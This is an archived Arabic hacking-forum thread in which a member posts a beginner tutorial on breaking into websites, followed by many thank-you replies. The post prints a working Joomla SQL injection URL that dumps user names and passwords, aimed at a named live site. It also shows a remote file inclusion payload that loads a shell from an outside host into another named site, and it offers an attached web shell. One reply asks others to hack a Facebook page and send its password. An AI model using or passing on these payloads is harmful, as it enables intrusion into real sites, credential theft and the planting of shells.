المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : يالله زهقت ابي اتعلم الهكر! تفضل لهون ^_^(صور)



lord_kwk
03-01-2011, 01:49 PM
السلام عليكم ورحمة الله وبركاته طبعا بعد غياب طويل عن المنتدى لاخذ دورات في هكر وقد تخطيت مرحلة الابتدائية واصبحت في المتوسطة في الهكر
احب اعطي الدروس اللي تخليك تطلع من الابتدائية !
1-انا ادور بقوقل رفع الشل اكتب رفع الشل يطلعلي ثغرات ياخي شهالحال ؟
اوك انا اقولك شسالفه!
الثغرات انواع :
1-الفايل انكلود
2-الفايل ابلود
sql
xss
هذول اللي انا بخترق فيهم
طبعا في ملياان انواع ثغرات بس هذول موجودين باغلب المواقع
طيب لورد هوا انا علي احفظ هاد كلو ؟؟
طيب لورد والله هيك صعب!
ياخي انا ماقلتلك احفظ
طبعا معروف انو في موقع للثغرات اسمو ميلورم
(وتسكر)
نزل بديل بس هاد البديل فيه كل ثغارت الميلورم ومطور اكتر
http://www.exploit-db.com/
طبعا طرق الاستغلال نفسها للي كان يعرف الموقع القديم واللي ما يعرف مممم؟؟؟؟
منعلمو ^_^
طبعا جميع الحقوق محفوظه لمنتديات جيوش الهكرز
طبعا من كثر ما دورت شروحات اشوف انو احيانا الصور ما تظهر لذلك رح اشرح كتابة وصور ^_^

صورة الموقع

http://www2.0zz0.com/2011/03/01/09/957129154.jpg
طيب اول شي رح نشرح كيف نشوف الثغرة الللي بدنا ياها
مندخل الموقع اللي بدنا نخترقو اذا ما كان مركب سكربت شو نعمل نقفل !
لالا اوعى
منطلع الاي بي تبع السيرفر
ممم كيف؟
انا بقلك
افتح رن او تشغيل او شاشة الدوس مثل ما بقولو
اكتب cmd
jفتح عندك شاشة الاوامر
لا لورد تكفى لا تفوتنا بالحيط ما بدنا اوامر
ياعمي اهدى بس انسخ والصق انت وما عليك
لما تفتح الشاشة السودة
اكتب او انسخ
ping google.com
طيب مكان google.com
منحط موقعنا مثلا بدنا نخترق يوتيوب منحط الموقع بدون www
بتصير هيك
ping youtube.com
لاتنسو الفراغ اللي بالنص
بيطلعلك الاي بي
متل هيك
http://www2.0zz0.com/2011/03/01/09/456633344.jpg
غلطبت بالنسخ انا سموحة يالاعضاء لنسخ الايبي رايت كلك تحديد علامة
بعدين من زاوية نافذه الشاشة السودة رايت كلك بعدين تحرير بعدبن نسخ ^_^
يالله والله تعبت من الكتابة
يالله لعيون الاعضاء منكمل
طيب لورد شو بفيدنا اي بي السيرفر ؟
انا بقلك بفيدك انك بتقدر تطلع السكربتات اللي مركبها على موقعو او مواقع من سيرفرو
وين نروح ؟
روح www.msn.com
شو اسوي هناك ؟
حط هيك
ip :74.125.127.93 id
الشرح
ip :74.125.127.93
معناتها اي بي السيرفر
id عشان نشوف مصاب بالsql
لو بدنا نعرف مصاب ولا لا
منحط ورا id=1مثلا
علامة '
بس ورح يطلعلك سيكيو ال ايرور او تختفي صوره او تحس في تغير بالموقع
طبعا للستغلال رح ريحك من الاستغلال اليدوي نزل برنامج هافيج واكتب شرحو موجود بالمنتدى جيوش الهكرز او شوفو على قوقل
طيب لو مو مصاب نقعد ندور على سكربتات مركبة بالموقع كيف ؟
ممم ادخل الموقع دور بالصفحات بلكي تلاقي سكربت جوملا او وورد بريس او ديجي شات مليان ثغرات
طيب لنفترض انو لقينا ثغرة جوملا شو نعمل انا بقلك روح exploit-db.com
في search
اضغط عليها
وتابع
http://www2.0zz0.com/2011/03/01/09/243070866.jpg
تكفون عطوني استراحة:tongue:
طيب بعد ما حطينا سيرش طلعلنا الثغرات
شباب لا تروحو استنو انا عارف انو نصكم قال زهق بكرا بكمل يعمي استنا يمكن تتعلم تخترق اليوم ^_^
هلا بطلعنا صفحه مليانة ثغرات عن السيكربتjoomla
طيب كيف نستغل االله يستر انا رح اختار وحده عشوائيه
http://www2.0zz0.com/2011/03/01/10/709116383.jpg
بعد ما دخلنا عالثغرة اللي هيي رابطها http://www.exploit-db.com/exploits/15610/
نشوف المعطيات
http://www2.0zz0.com/2011/03/01/10/976152696.jpg

[+] Dork: inurl:"index.php?option=com_jeajaxeventcalendar"
dork معناها انو الرابط اللي وراها نبحث عنو فقوقل او بالموقع اللي بتحب تبحث فيو
================================================== ========================

[+] exploit:
http://127.168.1.1/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
هاد الاستغلال طيب شو هاد يا لورد فهمنا مممم انا بقللكم
http://127.168.1.1 معناها رابط الموقع
هي الثغرة اللي بحثنا عنها /index.php?option=com_jeajaxeventcalendar

حط وراها &view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--
بصير متل هاد الرابط مثلا ادخلو استغلو ^_^
https://defend.ht/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat%28username,0x3a,password%29,4/**/from/**/jos_users
طيب هيك عرفنا نستغل ال sql
والفايل انكلود يا لورد مممم والله انا تعبان بس يالله
هي رابط ثغرة انكلود http://www.exploit-db.com/exploits/15814/



.:. Dork : inurl:"com_ponygallery"

################################################## ##################

===[ Exploit ]===

www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path =[shell.txt?]
www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?]
شو معناة هالكلام طبعا متل الشرح اللي فوق تبحث عن الدورك
بس ضل شي جديد احنا هون بدنا نرفع الشل للاختراق طبعا بشدد الف مره حتى هوا كاتبلك[shell.txt
معناها انو الشل لازم يكون بامتداد txtبس طبعا انا اضبطكم خدو هاد شل تكست
http://www.theittihad.com/newupload/vndqilbmrjkp.txt
بس ضل شي مهم جدا بدونو ولا كانك عملت شي
علامة ?
? هي العلامة لازم تكون موجوده ورا لشل
لنعطيكم رابط مرفوع دققيقه لنعطيكم
http://www.domovina-g-hrgovi.com/administrator/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=http ://www.theittihad.com/newupload/vndqilbmrjkp.txt?
يالله كيفو
هيك شرحنا ثغرتين صحيح طولنا بس ان شاء الله تكونو فهمتو
مع اني تعبت بس رح اشرحلكم اسهل ثغرة اللي هيه فايل ابلود
هي رابط ثغرة انتو افهموه لانو راسي انفجر http://www.exploit-db.com/exploits/12700/
طبعا ابحثو عن الدورك وبقللكم ارفعو الشل بامتداد jpg

جميع الحـ قوق محفوظه لمنتديات


اخوكم LoRd_kwk
[email protected]
^_^
:redface::redface::redface::redface:
مرفق مع الشرح شل عشان تجربو الفايل ابلود ^_^1208

lord_kwk
03-01-2011, 01:53 PM
والله تعبت ارجو ردود جميلة ^_^

e . V . E . L
03-01-2011, 02:46 PM
شرح رائع وجميل ويستحق الشكر والتقييم ..

اهنيك ياراعي الموضوع على براعتك في الشرح للاخوان المبتدئين ..

وتم التقييم ..

lord_kwk
03-01-2011, 02:56 PM
شرح رائع وجميل ويستحق الشكر والتقييم ..

اهنيك ياراعي الموضوع على براعتك في الشرح للاخوان المبتدئين ..

وتم التقييم ..

عفوا من واجبنا نعلم الجيل الهكرجي اللي ورانا نحن السابقون وهم اللاحقون ^_^
هاد اول شرح لي بالمنتدى

هاوي حنانك
03-01-2011, 06:08 PM
عفوا من واجبنا نعلم الجيل الهكرجي اللي ورانا نحن السابقون وهم اللاحقون ^_^


اعجبتني هذه الجمله ,,,

سلمت يدااااك يا وحش ,,, والله يعطيك العافيه على هذا الموضوع والشرح الراائع والواافي

الى الامام ,,, والله يوفقك

chamsou_23i
03-01-2011, 06:35 PM
مشكوره والله يعطيك العافيه
شرح واضح ومتعوب عليه <<يستحق التثبيت
صحيح ثانكس على الاهداء ياعسل

وبالتوفيق ان شاء الله

lord_kwk
03-01-2011, 07:10 PM
حبيبي هاوي حنانك تسلم على االاطراء الجميل chamsou_23i تسلم يا حياتي انتا العسل

sunlight
03-02-2011, 10:36 AM
الف شكر لك اخوي
الله يجزاك خير ويجعلها بموازين حسناتك
تقبل فائق تقديري واحترامي
وتستاهل احلى تقييم

حسن الغالي
03-02-2011, 10:38 AM
سلمت يدآكـ يآغآلي

lord_kwk
03-02-2011, 12:23 PM
اهلا وسهلا اخواني شرفتم
ومشكورين عالاطراء الرائع والتقييم

ناصر السر
03-02-2011, 12:44 PM
يسلووو يا استاذ ع الشرح الرائع و موفق انشاء الله

lord_kwk
03-02-2011, 12:50 PM
تسلم اخوي
^_^

Crypto Seven
03-02-2011, 01:31 PM
موضوع اقل ما يقال عنه رائع واصل خيو موفق انشاء الله

lord_kwk
03-02-2011, 01:36 PM
تــــــــــــسلم اخوي على اطرائك

matrix_reloadz
03-02-2011, 01:51 PM
مجهود فوق الرائع
تحياتي لك لورد
واصل من دون فواصل
تقبل تحياتي وتقديري لمجهوداتك

The shadow
03-02-2011, 11:46 PM
شرح جميل ومتعوب عليه وفقك الله وننتظر مزيد من الشروحات
تحياتي لك

kŝă-4ẹϋÊŔ
03-03-2011, 05:19 AM
الف شكر ياغالي

ابداع والله

lord_kwk
03-03-2011, 10:44 AM
سلمتم يا اخواني

HITMAN-HACK
03-03-2011, 11:08 AM
مشكووووووووووووووووور يا عزيزي عالموضوع روعه

lord_kwk
03-03-2011, 01:25 PM
مشكووووووووووووووووور يا عزيزي عالموضوع روعه

تسلم اخوي
^_^

System 32
03-03-2011, 04:25 PM
مشكووور علي الشرح الوافي
تقبل مروور ي
:)

lord_kwk
03-03-2011, 06:31 PM
ـــ تـ سلم اخوي على الاطراء ^_^

Crazy.meta
03-04-2011, 05:47 PM
مبدع يا بطل ويعطيك عافيه على الشرح والوافي

askri01
03-04-2011, 05:47 PM
الحياة قصة حزينة* الفها الخائن* وعاشها المظلوم* وصورها الالم* وانتخبها العذاب* واخرجها الزم* وبكت عليها العيون

lord_kwk
03-04-2011, 06:33 PM
تسلموني اخواني على الرد الجميل ونبغى نشوف شروحاتكم الجميلة

قوتشي
12-13-2011, 01:07 AM
اللله يعطيك العافيه :wink:

ѕτσяίεѕ
12-13-2011, 04:18 AM
كككفوو والله

يعطيك العافيـةة شرح متعووب عليـةة

تقبل مرووري ..~

hbkm
12-14-2011, 02:09 AM
ههههه انا اضحك عشان الموضوع تعبت ونا اقراه بس صراحه شرح موفق

والطرح الرائع وصراحه انا كل ما جيت اطلع القاك كاتب كلمات تحمس الله يهديك بالقوه اقراه كله ههههههههههههههههه

لك مني احلى تحيه +احلى تقييم وتستاهل كل خير ................... :frown:

تحياتي لك

majnon chamal
12-14-2011, 04:16 AM
مشكوووووور ياغالي
وجزاك الله عنا كل خير


http://im9.gulfup.com/2011-12-13/1323825367881.jpg (http://www.gulfup.com/show/Xjkd7zmmqflp)

نوازدحام القحطاني
12-14-2011, 08:19 AM
تستحق الشكر والتقدير لشرحك المتميز المتألق

ارفع قبعتي احترامآ وتقديرآ لشخصك المبدع

تقبل مروري

بنوته هكر
12-16-2011, 10:46 AM
ما فهمت شئ ههههههه

jack sparrow
12-18-2011, 03:49 PM
شكرا جزيلا و الله انل ما قهمت ولا حاجة

هكرV.B.N
12-18-2011, 09:06 PM
تكفوووون هكروووو ذا يسبوووون السعودية بالفيس بوك
http://www.facebook.com/ArabIdol
Arab Idol‏
وارسلولي الباسورد والايميل

kabten000
01-01-2012, 10:54 PM
شكرااااااااااااااااااااا

kabten000
01-06-2012, 04:54 PM
شكراااااااااااااااااااا

الهكر_الفضي
01-09-2012, 02:34 AM
شكرا كتيررررررر

احمد منصور
01-09-2012, 01:42 PM
http://www.samysoft.net/fmm/fimnew/shokr/2/80898296.gif (http://www.samygames.com/)

سيد الامنيات
01-09-2012, 11:02 PM
موضوع حلو كتير وشكرا على المجهود المتميز

FadyHaCKrZ
01-10-2012, 02:04 AM
والله انا مثللك ناوي اطلع من ان اكون مبتدئ

يحيي الصدامي
02-27-2012, 05:20 AM
مشكوؤوؤور يا وحش

lord_kwk
02-01-2013, 12:12 PM
ثانكس يا شباب وانا كنت مشغول بالثانويه وهلا رجعت اي مساعده انا موجود :-*

Saad.Nabir111
02-01-2013, 12:27 PM
سلمت يداك و يعطيك العافية
http://www.freeimagehost.info/files/img/display/imagedisplay_5kozdm7gl9s.gif.php

مجنون هكر333
02-01-2013, 12:34 PM
واصل يابطل
موفق

lord_kwk
02-01-2013, 12:38 PM
thnxxx :-*

shhaby
02-02-2013, 01:30 AM
http://www.samysoft.net/forumim/shokr/4/fgsgsdg.gif

яÀήềM ĴőřđÁЙ
02-02-2013, 04:29 AM
شكراا سلمت يداك

dark prince
02-02-2013, 05:25 AM
سلمت يداك اخي جزاك كل خير

hacker maroco
02-02-2013, 05:43 AM
تم تقييم بركة الله فيك